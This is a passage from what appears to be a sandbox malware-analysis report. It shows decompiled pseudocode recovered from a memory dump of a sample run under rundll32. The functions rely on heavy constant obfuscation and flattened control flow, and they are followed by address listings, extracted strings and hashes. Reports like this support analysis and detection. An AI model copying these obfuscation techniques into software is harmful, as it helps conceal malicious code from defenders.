				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				unsigned int _v308;
				signed int _v312;
				signed int _v316;
				signed int _t462;
				intOrPtr* _t466;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				intOrPtr _t521;
				void* _t522;
				void* _t525;
				void* _t528;
				intOrPtr* _t531;
				signed int* _t532;

				_t466 = __ecx;
				_t532 =  &_v316;
				_v140 = __edx;
				_v144 = __ecx;
				_v132 = _v132 & 0x00000000;
				_v136 = 0x75b778;
				_v308 = 0x9968;
				_v308 = _v308 | 0x0cfdc455;
				_v308 = _v308 + 0xdd4c;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x019fad6f;
				_v172 = 0xa03a;
				_v172 = _v172 >> 8;
				_v172 = _v172 ^ 0x00000391;
				_v228 = 0x2930;
				_v228 = _v228 << 0xc;
				_v228 = _v228 ^ 0x02930f5f;
				_v220 = 0x5883;
				_v220 = _v220 + 0xffff1c36;
				_v220 = _v220 ^ 0xffff6a37;
				_v288 = 0x122f;
				_v288 = _v288 << 0xf;
				_v288 = _v288 + 0xd44b;
				_v288 = _v288 << 0xa;
				_v288 = _v288 ^ 0x6151757c;
				_v260 = 0xc525;
				_v260 = _v260 << 0xa;
				_t522 = 0x1b8692db;
				_t513 = 0x61;
				_v260 = _v260 / _t513;
				_v260 = _v260 ^ 0x00083ddd;
				_v164 = 0x49a7;
				_t514 = 0x7b;
				_t462 = 0x17;
				_v164 = _v164 * 0x76;
				_v164 = _v164 ^ 0x002193f4;
				_v300 = 0x59a2;
				_v300 = _v300 ^ 0x3b27ac73;
				_v300 = _v300 + 0xffff6ec5;
				_v300 = _v300 + 0xffffb5fd;
				_v300 = _v300 ^ 0x3b271e50;
				_v252 = 0xb9af;
				_v252 = _v252 >> 8;
				_v252 = _v252 + 0xffffa108;
				_v252 = _v252 ^ 0xfffffedf;
				_v196 = 0x7b72;
				_v196 = _v196 << 2;
				_v196 = _v196 ^ 0x0001e8b2;
				_v272 = 0x250d;
				_v272 = _v272 * 0x16;
				_v272 = _v272 >> 3;
				_v272 = _v272 / _t514;
				_v272 = _v272 ^ 0x0000021c;
				_v156 = 0x4ea8;
				_v156 = _v156 + 0xffff8c10;
				_v156 = _v156 ^ 0xffffc687;
				_v292 = 0x9a7d;
				_v292 = _v292 << 1;
				_v292 = _v292 / _t462;
				_v292 = _v292 | 0x2e5edf0a;
				_v292 = _v292 ^ 0x2e5e89f7;
				_v236 = 0x69d3;
				_t515 = 0x5a;
				_v236 = _v236 / _t515;
				_v236 = _v236 >> 0xf;
				_v236 = _v236 ^ 0x000046bd;
				_v268 = 0x8cb9;
				_v268 = _v268 + 0xffff2c59;
				_v268 = _v268 << 4;
				_v268 = _v268 << 2;
				_v268 = _v268 ^ 0xffee6fc7;
				_v284 = 0x8a1;
				_v284 = _v284 ^ 0x358a3729;
				_v284 = _v284 << 4;
				_v284 = _v284 + 0xde3b;
				_v284 = _v284 ^ 0x58a4aa69;
				_v264 = 0x360c;
				_v264 = _v264 ^ 0xc2d2005c;
				_v264 = _v264 << 6;
				_t516 = 0x32;
				_v264 = _v264 * 0x5c;
				_v264 = _v264 ^ 0xe2e17670;
				_v180 = 0x8be;
				_v180 = _v180 | 0xafaf70c7;
				_v180 = _v180 ^ 0xafaf5d0a;
				_v168 = 0x59fe;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0x0b3f82ad;
				_v188 = 0x197e;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x0001c80c;
				_v256 = 0x542a;
				_v256 = _v256 + 0x92cc;
				_v256 = _v256 | 0xa238a407;
				_v256 = _v256 ^ 0xa2389846;
				_v224 = 0x7627;
				_v224 = _v224 + 0xdff4;
				_v224 = _v224 ^ 0x000122df;
				_v316 = 0x3ece;
				_v316 = _v316 * 0x74;
				_v316 = _v316 >> 8;
				_v316 = _v316 | 0xc6a89cdb;
				_v316 = _v316 ^ 0xc6a8f635;
				_v244 = 0x10d9;
				_v244 = _v244 | 0xf517e732;
				_v244 = _v244 + 0x5e6f;
				_v244 = _v244 ^ 0xf518070f;
				_v160 = 0xb68b;
				_v160 = _v160 >> 7;
				_v160 = _v160 ^ 0x00003a74;
				_v276 = 0x3579;
				_v276 = _v276 | 0x431a7672;
				_v276 = _v276 << 2;
				_v276 = _v276 / _t516;
				_v276 = _v276 ^ 0x003ff326;
				_v216 = 0xcfb7;
				_t517 = 0x63;
				_v216 = _v216 / _t517;
				_v216 = _v216 ^ 0x00003917;
				_v312 = 0xd3b7;
				_v312 = _v312 ^ 0x43b1e200;
				_v312 = _v312 << 8;
				_t518 = 0x70;
				_v312 = _v312 / _t518;
				_v312 = _v312 ^ 0x01952af0;
				_v248 = 0xe683;
				_v248 = _v248 | 0xeb182d0f;
				_v248 = _v248 + 0xcf0c;
				_v248 = _v248 ^ 0xeb19e4ec;
				_v204 = 0xada2;
				_v204 = _v204 >> 0x10;
				_v204 = _v204 ^ 0x000009df;
				_v152 = 0xb32a;
				_v152 = _v152 + 0xffff4f9d;
				_v152 = _v152 ^ 0x00004085;
				_v212 = 0xbe4c;
				_t531 = _a4;
				_v212 = _v212 * 5;
				_v212 = _v212 ^ 0x00039e07;
				_v280 = 0xc7f7;
				_v280 = _v280 | 0xad7c9e6f;
				_v280 = _v280 * 0x1c;
				_v280 = _v280 | 0xde3ec68b;
				_v280 = _v280 ^ 0xffbea491;
				_v240 = 0x8de7;
				_v240 = _v240 * 0x45;
				_t463 = _v140;
				_v240 = _v240 / _t462;
				_v240 = _v240 ^ 0x00019f2b;
				_v304 = 0x16f;
				_v304 = _v304 | 0xdf403998;
				_v304 = _v304 ^ 0x6a41af55;
				_v304 = _v304 | 0x5f7c1de9;
				_v304 = _v304 ^ 0xff7dd65d;
				_v208 = 0xa25a;
				_v208 = _v208 / _t518;
				_v208 = _v208 ^ 0x00007fd0;
				_v184 = 0x444f;
				_t519 = 0x26;
				_v184 = _v184 * 0x7d;
				_v184 = _v184 ^ 0x002171af;
				_v192 = 0x6191;
				_v192 = _v192 << 6;
				_v192 = _v192 ^ 0x00185c0b;
				_v200 = 0x9864;
				_v200 = _v200 / _t519;
				_v200 = _v200 ^ 0x0000693d;
				_v232 = 0xae1;
				_v232 = _v232 ^ 0x7986b26b;
				_t520 = 0x49;
				_t521 = _v140;
				_v232 = _v232 / _t520;
				_v232 = _v232 ^ 0x01aa59fa;
				_v176 = 0xf7eb;
				_v176 = _v176 * 0x67;
				_v176 = _v176 ^ 0x0063e620;
				_v296 = 0x2b09;
				_v296 = _v296 + 0xffffdaa4;
				_v296 = _v296 | 0x1659e70b;
				_v296 = _v296 ^ 0x3abae7e6;
				_v296 = _v296 ^ 0x2ce32170;
				while(_t522 != 0xa551406) {
					if(_t522 == 0x10f51287) {
						E00212674(_v204, _v152,  *((intOrPtr*)(_t466 + 4)), _t521, _v212, _v280,  *_t466);
						_t466 = _v144;
						_t532 =  &(_t532[5]);
						_t522 = 0x3013e9c6;
						_t521 = _t521 +  *((intOrPtr*)(_t466 + 4));
						continue;
					}
					if(_t522 == 0x14284095) {
						_t522 = 0x28f75045;
						_a4 =  *((intOrPtr*)(_t466 + 4)) + 0x1000;
						continue;
					}
					if(_t522 == 0x1b8692db) {
						_v148 = E00218C8F(_t466);
						_t522 = 0x14284095;
						L10:
						_t466 = _v144;
						continue;
					}
					if(_t522 == 0x28f75045) {
						_push(_t466);
						_push(_t466);
						_t521 = E00208736(_a4);
						 *_t531 = _t521;
						__eflags = _t521;
						if(_t521 == 0) {
							L16:
							__eflags = 0;
							return 0;
						}
						_t522 = 0xa551406;
						_t463 = _a4 + _t521;
						__eflags = _a4 + _t521;
						goto L10;
					}
					_t541 = _t522 - 0x3013e9c6;
					if(_t522 != 0x3013e9c6) {
						L15:
						__eflags = _t522 - 0x28249ddd;
						if(__eflags != 0) {
							continue;
						}
						goto L16;
					}
					_push(0x21c7a0);
					_push(_v208);
					E00207F4B(_t521, E0021878F(_v240, _v304, _t541), _v184, _v140, _v192, _v200);
					E00212025(_v232, _t457, _v176, _v296);
					return 1;
				}
				_t525 = (E0020EDCF(_v260, _v164,  &_v148, _v300) & 0x0000000f) + 4;
				E0020B605( &_v64,  &_v148, _t525, _v252, _v196, _v272);
				_t373 =  &_v292; // 0xe2e17670
				 *((char*)(_t532 + _t525 + 0x130)) = 0;
				_t528 = (E0020EDCF(_v156,  *_t373,  &_v148, _v236) & 0x0000000f) + 4;
				E0020B605( &_v128,  &_v148, _t528, _v268, _v284, _v264);
				_push(0x21c710);
				_push(_v188);
				 *((char*)(_t532 + _t528 + 0x10c)) = 0;
				_t521 = _t521 + E002011C1( &_v64, _v224, _v316,  &_v128, _v140, _t521, _v244, _v160, _t463 - _t521, E0021878F(_v180, _v168, __eflags), _v276);
				__eflags = _t521;
				E00212025(_v216, _t440, _v312, _v248);
				_t466 = _v144;
				_t532 =  &(_t532[0x1c]);
				_t522 = 0x10f51287;
				goto L15;
			}

0x0021511b
0x0021511b
0x00215125
0x0021512c
0x00215133
0x0021513b
0x00215146
0x0021514e
0x00215156
0x0021515e
0x00215163
0x0021516b
0x00215176
0x0021517e
0x00215189
0x00215191
0x00215196
0x0021519e
0x002151a6
0x002151ae
0x002151b6
0x002151be
0x002151c3
0x002151cb
0x002151d0
0x002151d8
0x002151e0
0x002151e9
0x002151f2
0x002151f7
0x002151fd
0x00215205
0x00215218
0x0021521b
0x0021521e
0x00215225
0x00215230
0x00215238
0x00215240
0x00215248
0x00215250
0x00215258
0x00215260
0x00215265
0x0021526d
0x00215275
0x00215280
0x00215288
0x00215293
0x002152a0
0x002152a4
0x002152b1
0x002152b5
0x002152bd
0x002152c8
0x002152d3
0x002152de
0x002152e6
0x002152f0
0x002152f4
0x002152fc
0x00215306
0x00215312
0x00215317
0x0021531d
0x00215322
0x0021532a
0x00215332
0x0021533a
0x0021533f
0x00215344
0x0021534c
0x00215354
0x0021535c
0x00215361
0x00215369
0x00215371
0x00215379
0x00215381
0x0021538b
0x0021538e
0x00215392
0x0021539a
0x002153a5
0x002153b0
0x002153bb
0x002153c6
0x002153ce
0x002153d9
0x002153e4
0x002153ec
0x002153f7
0x002153ff
0x00215407
0x0021540f
0x00215417
0x0021541f
0x00215427
0x0021542f
0x0021543c
0x00215440
0x00215445
0x0021544d
0x00215455
0x0021545d
0x00215465
0x0021546d
0x00215475
0x00215480
0x00215488
0x00215493
0x0021549b
0x002154a3
0x002154b0
0x002154b4
0x002154bc
0x002154c8
0x002154cd
0x002154d3
0x002154db
0x002154e3
0x002154eb
0x002154f4
0x002154f7
0x002154fb
0x00215503
0x0021550b
0x00215513
0x0021551b
0x00215525
0x00215530
0x00215538
0x00215543
0x0021554e
0x00215559
0x00215564
0x00215573
0x0021557a
0x0021557e
0x00215586
0x0021558e
0x0021559b
0x0021559f
0x002155a7
0x002155af
0x002155bc
0x002155c8
0x002155cf
0x002155d3
0x002155db
0x002155e3
0x002155eb
0x002155f3
0x002155fb
0x00215603
0x00215619
0x00215620
0x0021562b
0x0021563e
0x00215641
0x00215648
0x00215653
0x0021565e
0x00215666
0x00215671
0x00215687
0x0021568e
0x00215699
0x002156a1
0x002156ad
0x002156b0
0x002156b7
0x002156bb
0x002156c3
0x002156d6
0x002156dd
0x002156e8
0x002156f0
0x002156f8
0x00215700
0x00215708
0x00215710
0x00215722
0x00215848
0x0021584d
0x00215854
0x00215857
0x0021585c
0x00000000
0x0021585c
0x0021572e
0x00215817
0x00215821
0x00000000
0x00215821
0x0021573a
0x00215806
0x0021580d
0x002157ea
0x002157ea
0x00000000
0x002157ea
0x00215746
0x002157c7
0x002157c8
0x002157d1
0x002157d3
0x002157d8
0x002157da
0x00215998
0x00215998
0x00000000
0x00215998
0x002157e3
0x002157e8
0x002157e8
0x00000000
0x002157e8
0x00215748
0x0021574e
0x0021598c
0x0021598c
0x00215992
0x00000000
0x00000000
0x00000000
0x00215992
0x00215754
0x00215759
0x00215792
0x002157ab
0x00000000
0x002157b5
0x002158a2
0x002158a7
0x002158b0
0x002158c3
0x002158ef
0x002158f4
0x002158f9
0x002158fe
0x00215913
0x0021596b
0x0021596b
0x00215978
0x0021597d
0x00215984
0x00215987
0x00000000

Strings

0), xrefs: 00215189
*T, xrefs: 002153F7
|uQa, xrefs: 002151D0
c, xrefs: 002156DD
%, xrefs: 00215293
o^, xrefs: 00215465
p!,, xrefs: 00215708
'v, xrefs: 00215417
=i, xrefs: 0021568E
y5, xrefs: 00215493
r{, xrefs: 00215275
t:, xrefs: 00215488
OD, xrefs: 0021562B
pv, xrefs: 002158B0

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: %$ c$'v$*T$0)$=i$OD$o^$p!,$pv$r{$t:$y5$|uQa
API String ID: 0-2620103065
Opcode ID: 04f7b6b37f95226fff576076d9395f0f4ffdf1b648325ac4cc4b1cddf856546c
Instruction ID: ea886fca3a8e159e144ea1276272efffda3086ac63cb7047e08fc0d9e9c98beb
Opcode Fuzzy Hash: 04f7b6b37f95226fff576076d9395f0f4ffdf1b648325ac4cc4b1cddf856546c
Instruction Fuzzy Hash: 96223371508380DFE364CF25C58AA8BFBE2BBC4748F108A1DE5D9962A1C7B58959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00204A35, Relevance: 16.7, Strings: 13, Instructions: 468
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00204A35(intOrPtr __ecx, signed int __edx) {
				char _v524;
				char _v1044;
				char _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				char _v1576;
				intOrPtr _v1580;
				char _v1584;
				intOrPtr _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				unsigned int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				signed int _v1768;
				signed int _v1772;
				signed int _v1776;
				signed int _v1780;
				signed int _v1784;
				signed int _v1788;
				signed int _v1792;
				signed int _v1796;
				signed int _v1800;
				void* _t474;
				void* _t475;
				signed int _t479;
				signed int _t491;
				signed int _t496;
				signed int _t500;
				signed int _t510;
				signed int _t511;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				void* _t520;
				signed int _t524;
				void* _t530;
				void* _t532;
				signed int _t572;
				signed int _t573;
				signed int _t574;
				signed int _t575;
				void* _t579;
				void* _t580;
				void* _t582;

				_v1628 = 0xed3;
				_v1628 = _v1628 + 0xd002;
				_v1628 = _v1628 ^ 0x0000defc;
				_v1796 = 0x50e8;
				_v1796 = _v1796 + 0xffffea13;
				_v1796 = _v1796 >> 0xe;
				_v1796 = _v1796 ^ 0x3dc2eaa9;
				_v1796 = _v1796 ^ 0x3dc2b05a;
				_v1604 = 0xecd0;
				_v1604 = _v1604 << 0xd;
				_v1604 = _v1604 ^ 0x1d9a54ec;
				_v1636 = 0xad8d;
				_v1636 = _v1636 >> 0xc;
				_v1636 = _v1636 ^ 0x000019e2;
				_v1600 = 0x1846;
				_v1592 = __edx;
				_t574 = 0x4762904;
				_v1588 = __ecx;
				_t510 = 0x63;
				_v1600 = _v1600 / _t510;
				_v1600 = _v1600 ^ 0x00006484;
				_v1740 = 0xfd34;
				_v1740 = _v1740 ^ 0x1b9865fd;
				_v1740 = _v1740 ^ 0xced01448;
				_v1740 = _v1740 ^ 0xd548e885;
				_v1684 = 0x582a;
				_t572 = 0x3b;
				_v1684 = _v1684 / _t572;
				_v1684 = _v1684 ^ 0x000016a0;
				_v1724 = 0x2b60;
				_t511 = 0x34;
				_v1724 = _v1724 / _t511;
				_v1724 = _v1724 ^ 0xf4396e09;
				_v1724 = _v1724 ^ 0xf4397db5;
				_v1732 = 0x220f;
				_v1732 = _v1732 ^ 0x234d952a;
				_v1732 = _v1732 >> 1;
				_v1732 = _v1732 ^ 0x11a6b27c;
				_v1616 = 0x4d57;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x026acda8;
				_v1672 = 0x3d68;
				_v1672 = _v1672 + 0xffff611f;
				_v1672 = _v1672 ^ 0xffff811c;
				_v1800 = 0xf339;
				_v1800 = _v1800 + 0xfffff0f7;
				_v1800 = _v1800 + 0x895c;
				_v1800 = _v1800 + 0xc572;
				_v1800 = _v1800 ^ 0x000271c2;
				_v1664 = 0x37c5;
				_v1664 = _v1664 + 0xffffa7ba;
				_v1664 = _v1664 ^ 0xffffa1b5;
				_v1632 = 0xc51c;
				_v1632 = _v1632 >> 4;
				_v1632 = _v1632 ^ 0x00001093;
				_v1640 = 0x76f9;
				_v1640 = _v1640 ^ 0x9fffdcc0;
				_v1640 = _v1640 ^ 0x9fff82e4;
				_v1648 = 0x8076;
				_v1648 = _v1648 * 7;
				_v1648 = _v1648 ^ 0x0003a5e4;
				_v1708 = 0x21bc;
				_v1708 = _v1708 + 0xc05f;
				_v1708 = _v1708 << 6;
				_v1708 = _v1708 ^ 0x0038a40f;
				_v1784 = 0xa89a;
				_v1784 = _v1784 / _t572;
				_v1784 = _v1784 + 0xffffeb30;
				_v1784 = _v1784 << 0xa;
				_v1784 = _v1784 ^ 0xffb86208;
				_v1656 = 0x5b43;
				_v1656 = _v1656 ^ 0xe62d1ba2;
				_v1656 = _v1656 ^ 0xe62d5436;
				_v1792 = 0x5d3e;
				_v1792 = _v1792 >> 5;
				_v1792 = _v1792 + 0xfffff433;
				_v1792 = _v1792 ^ 0x1afa5a2f;
				_v1792 = _v1792 ^ 0xe50594ef;
				_v1680 = 0x9f3f;
				_v1680 = _v1680 + 0xfffff3b1;
				_v1680 = _v1680 ^ 0x0000dcc5;
				_v1780 = 0x8a4e;
				_v1780 = _v1780 >> 0xc;
				_v1780 = _v1780 + 0x10e4;
				_v1780 = _v1780 ^ 0x817594c9;
				_v1780 = _v1780 ^ 0x81758ecd;
				_v1748 = 0xbeb1;
				_v1748 = _v1748 | 0x408b0c07;
				_v1748 = _v1748 + 0xffff7379;
				_v1748 = _v1748 ^ 0x408b5cad;
				_v1752 = 0xb76f;
				_v1752 = _v1752 >> 0xe;
				_t512 = 0x23;
				_v1752 = _v1752 / _t512;
				_v1752 = _v1752 ^ 0x000011f4;
				_v1652 = 0x783b;
				_v1652 = _v1652 ^ 0xf6ea495a;
				_v1652 = _v1652 ^ 0xf6ea4537;
				_v1788 = 0x701e;
				_v1788 = _v1788 | 0x54ae9efd;
				_v1788 = _v1788 >> 0xa;
				_v1788 = _v1788 + 0x818c;
				_v1788 = _v1788 ^ 0x0015b45a;
				_v1756 = 0xfc95;
				_t513 = 0x4e;
				_v1756 = _v1756 / _t513;
				_v1756 = _v1756 | 0x6e3e6587;
				_v1756 = _v1756 ^ 0x6e3e48c8;
				_v1720 = 0xc52f;
				_v1720 = _v1720 >> 5;
				_v1720 = _v1720 << 2;
				_v1720 = _v1720 ^ 0x00007c98;
				_v1620 = 0xf570;
				_v1620 = _v1620 >> 0xa;
				_v1620 = _v1620 ^ 0x00006ca8;
				_v1712 = 0x65f6;
				_v1712 = _v1712 | 0x8fa1cc9c;
				_v1712 = _v1712 >> 9;
				_v1712 = _v1712 ^ 0x0047fc5c;
				_v1676 = 0xb942;
				_v1676 = _v1676 * 0x15;
				_v1676 = _v1676 ^ 0x000f4c8d;
				_v1736 = 0x950a;
				_v1736 = _v1736 | 0x9f71954d;
				_v1736 = _v1736 + 0xffff5dd1;
				_v1736 = _v1736 ^ 0x9f70c3f6;
				_v1704 = 0xd0f3;
				_v1704 = _v1704 + 0xffff53c3;
				_v1704 = _v1704 ^ 0xce9fbdc0;
				_v1704 = _v1704 ^ 0xce9f87f0;
				_v1596 = 0x1518;
				_v1596 = _v1596 + 0x85a2;
				_v1596 = _v1596 ^ 0x000083d8;
				_v1668 = 0x64f;
				_v1668 = _v1668 + 0xffff0b06;
				_v1668 = _v1668 ^ 0xffff3669;
				_v1728 = 0x3b1d;
				_v1728 = _v1728 + 0x874c;
				_v1728 = _v1728 | 0x620470b3;
				_v1728 = _v1728 ^ 0x6204e551;
				_v1696 = 0x2df9;
				_v1696 = _v1696 << 0xf;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 ^ 0x016fb4ca;
				_v1764 = 0xcc6;
				_v1764 = _v1764 | 0x8d34f989;
				_t514 = 0x74;
				_v1764 = _v1764 / _t514;
				_t515 = 0x18;
				_v1764 = _v1764 * 0x6c;
				_v1764 = _v1764 ^ 0x8377a340;
				_v1608 = 0x20b8;
				_v1608 = _v1608 + 0xffffe23d;
				_v1608 = _v1608 ^ 0x000040ba;
				_v1660 = 0xbd08;
				_v1660 = _v1660 | 0x92c929d6;
				_v1660 = _v1660 ^ 0x92c9e2c3;
				_v1644 = 0x1738;
				_v1644 = _v1644 + 0x2a2d;
				_v1644 = _v1644 ^ 0x00007d9b;
				_v1772 = 0x814c;
				_v1772 = _v1772 * 0x2f;
				_v1772 = _v1772 ^ 0x2fd35c8b;
				_v1772 = _v1772 << 9;
				_v1772 = _v1772 ^ 0x89c0ce59;
				_v1612 = 0xaccd;
				_v1612 = _v1612 << 0xb;
				_v1612 = _v1612 ^ 0x05662888;
				_v1624 = 0x6919;
				_v1624 = _v1624 >> 0xb;
				_v1624 = _v1624 ^ 0x00005c9e;
				_v1768 = 0x2455;
				_v1768 = _v1768 ^ 0xee213c0c;
				_v1768 = _v1768 + 0xffffdbe3;
				_v1768 = _v1768 >> 6;
				_v1768 = _v1768 ^ 0x03b8b908;
				_v1776 = 0x634b;
				_v1776 = _v1776 << 3;
				_v1776 = _v1776 * 0x44;
				_v1776 = _v1776 + 0xffff5e24;
				_v1776 = _v1776 ^ 0x00d21830;
				_v1688 = 0xdff8;
				_v1688 = _v1688 ^ 0x1c92e1a2;
				_v1688 = _v1688 ^ 0x1c9257de;
				_v1744 = 0xd5b6;
				_v1744 = _v1744 << 7;
				_v1744 = _v1744 ^ 0x97cdeac8;
				_v1744 = _v1744 ^ 0x97a72039;
				_v1692 = 0x89ed;
				_v1692 = _v1692 + 0xffff6a89;
				_v1692 = _v1692 | 0xb25fce0e;
				_v1692 = _v1692 ^ 0xfffff10e;
				_v1700 = 0xa1e5;
				_v1700 = _v1700 * 0x2a;
				_v1700 = _v1700 + 0xffff21dd;
				_v1700 = _v1700 ^ 0x00199ee5;
				_v1760 = 0x2165;
				_v1760 = _v1760 + 0xb9ba;
				_v1760 = _v1760 / _t515;
				_v1760 = _v1760 * 0x41;
				_v1760 = _v1760 ^ 0x000227fb;
				_v1716 = 0x5b5d;
				_v1716 = _v1716 | 0x7b7605fc;
				_v1716 = _v1716 >> 5;
				_v1716 = _v1716 ^ 0x03cbb2ff;
				_t474 = E00216D44(_t515);
				_t573 = _v1592;
				_t579 = _t474;
				_t508 = _v1592;
				while(1) {
					L1:
					_t475 = 0x1359b45f;
					do {
						while(1) {
							L2:
							_t582 = _t574 - 0x1dbe7493;
							if(_t582 > 0) {
								break;
							}
							if(_t582 == 0) {
								return E0020F536(_v1692, _v1700, _v1760, _t573);
							}
							if(_t574 != 0x4762904) {
								if(_t574 == 0x589c6e4) {
									E0020F536(_v1644, _v1772, _v1612, _t508);
									_pop(_t524);
									_t574 = 0x1e3f4be6;
									while(1) {
										L1:
										_t475 = 0x1359b45f;
										goto L2;
									}
								} else {
									if(_t574 == 0xb2e7f16) {
										_t524 = _v1748;
										_t500 = E00211773(_v1752, _v1584, _v1580, _v1652, _v1788);
										_t508 = _t500;
										_t580 = _t580 + 0x10;
										__eflags = _t500;
										_t475 = 0x1359b45f;
										_t574 =  !=  ? 0x1359b45f : 0x1e3f4be6;
										continue;
									} else {
										if(_t574 == 0xbe4541e) {
											_push(_t524);
											_push(_v1660);
											_push(0);
											_push(_v1608);
											_push(0);
											_push(_v1764);
											_t524 = _v1696;
											_push( &_v1564);
											E0020568E(_t524, 1);
											_t580 = _t580 + 0x1c;
											_t574 = 0x589c6e4;
											while(1) {
												L1:
												_t475 = 0x1359b45f;
												goto L2;
											}
										} else {
											if(_t574 == _t475) {
												_push(_v1720);
												E002029E3( &_v524, 0x104, E0021889D(0x21c8a0, _v1756, __eflags), _v1620, _v1712, _v1676, _t508,  &_v1564, _v1736, _v1704);
												_t580 = _t580 + 0x24;
												E00212025(_v1596, _t503, _v1668, _v1728);
												_pop(_t524);
												_t574 = 0xbe4541e;
												while(1) {
													L1:
													_t475 = 0x1359b45f;
													goto L2;
												}
											} else {
												if(_t574 != 0x1d7e83db) {
													goto L29;
												} else {
													E00214F7D(_v1688, _v1744, _v1576);
													_pop(_t524);
													_t574 = 0x3025b1cf;
													while(1) {
														L1:
														_t475 = 0x1359b45f;
														goto L2;
													}
												}
											}
										}
									}
								}
								L23:
								return _t496;
							}
							_push(_t524);
							_t530 = 0x38;
							_t496 = E00208736(_t530);
							_t573 = _t496;
							_t532 = _t524;
							__eflags = _t573;
							if(_t573 != 0) {
								_push(_t532);
								_push(_t532);
								_t524 = _v1684;
								E0020C6C7(_t524, _v1724,  &_v1044, _t532, _v1732, _v1628, _v1616);
								_t580 = _t580 + 0x1c;
								_t574 = 0x2d0f1252;
								while(1) {
									L1:
									_t475 = 0x1359b45f;
									goto L2;
								}
							}
							goto L23;
						}
						__eflags = _t574 - 0x1e3f4be6;
						if(_t574 == 0x1e3f4be6) {
							E0020F536(_v1624, _v1768, _v1776, _v1584);
							_t574 = 0x1d7e83db;
							_t475 = 0x1359b45f;
							goto L29;
						} else {
							__eflags = _t574 - 0x20ae1a02;
							if(_t574 == 0x20ae1a02) {
								_v1572 = E0021388A();
								_t479 = E00210ADC(_t478, _v1800, _v1664);
								_pop(_t520);
								_v1568 = 2 + _t479 * 2;
								E0020B35D(_t579, _t579, _v1632,  &_v1576, _t520, _v1640, _v1648, _t579, _v1708, _v1784, _v1656, _v1716, _v1792);
								_t580 = _t580 + 0x30;
								asm("sbb esi, esi");
								_t575 = _t574 & 0x097497a8;
								goto L25;
							} else {
								__eflags = _t574 - 0x27330c3b;
								if(_t574 == 0x27330c3b) {
									E002080BA( &_v1576, _v1680, _v1780,  &_v1584);
									asm("sbb esi, esi");
									_pop(_t524);
									_t574 = (_t574 & 0xedaffb3b) + 0x1d7e83db;
									goto L1;
								} else {
									__eflags = _t574 - 0x2d0f1252;
									if(_t574 == 0x2d0f1252) {
										_push( &_v524);
										E002088E5(_v1588, _v1592);
										asm("sbb esi, esi");
										_t524 = 0x21c8f0;
										_t575 = _t574 & 0x02efa56f;
										__eflags = _t575;
										L25:
										_t574 = _t575 + 0x1dbe7493;
										while(1) {
											L1:
											_t475 = 0x1359b45f;
											goto L2;
										}
									} else {
										__eflags = _t574 - 0x3025b1cf;
										if(_t574 == 0x3025b1cf) {
											 *((intOrPtr*)(_t573 + 0x24)) = _v1588;
											_t491 =  *0x21ca24; // 0x0
											 *(_t573 + 0x2c) = _t491;
											 *0x21ca24 = _t573;
											return _t491;
										}
										goto L29;
									}
								}
							}
						}
						goto L23;
						L29:
						__eflags = _t574 - 0x15e8ba90;
					} while (__eflags != 0);
					return _t475;
				}
			}

0x00204a3b
0x00204a46
0x00204a51
0x00204a5c
0x00204a64
0x00204a6c
0x00204a71
0x00204a79
0x00204a81
0x00204a8c
0x00204a94
0x00204a9f
0x00204aaa
0x00204ab2
0x00204abd
0x00204ad3
0x00204ada
0x00204ae3
0x00204aea
0x00204aef
0x00204af8
0x00204b03
0x00204b0b
0x00204b13
0x00204b1b
0x00204b23
0x00204b35
0x00204b3a
0x00204b43
0x00204b4e
0x00204b5a
0x00204b5d
0x00204b61
0x00204b69
0x00204b71
0x00204b79
0x00204b81
0x00204b85
0x00204b8d
0x00204b98
0x00204ba0
0x00204bab
0x00204bb6
0x00204bc1
0x00204bcc
0x00204bd4
0x00204bdc
0x00204be4
0x00204bec
0x00204bf4
0x00204bff
0x00204c0a
0x00204c15
0x00204c20
0x00204c28
0x00204c33
0x00204c3e
0x00204c49
0x00204c54
0x00204c67
0x00204c6e
0x00204c79
0x00204c81
0x00204c89
0x00204c8e
0x00204c98
0x00204ca8
0x00204cae
0x00204cb6
0x00204cbb
0x00204cc3
0x00204cce
0x00204cd9
0x00204ce4
0x00204cec
0x00204cf1
0x00204cf9
0x00204d01
0x00204d09
0x00204d14
0x00204d1f
0x00204d2a
0x00204d32
0x00204d37
0x00204d3f
0x00204d47
0x00204d4f
0x00204d57
0x00204d5f
0x00204d67
0x00204d6f
0x00204d77
0x00204d80
0x00204d85
0x00204d8b
0x00204d93
0x00204d9e
0x00204da9
0x00204db4
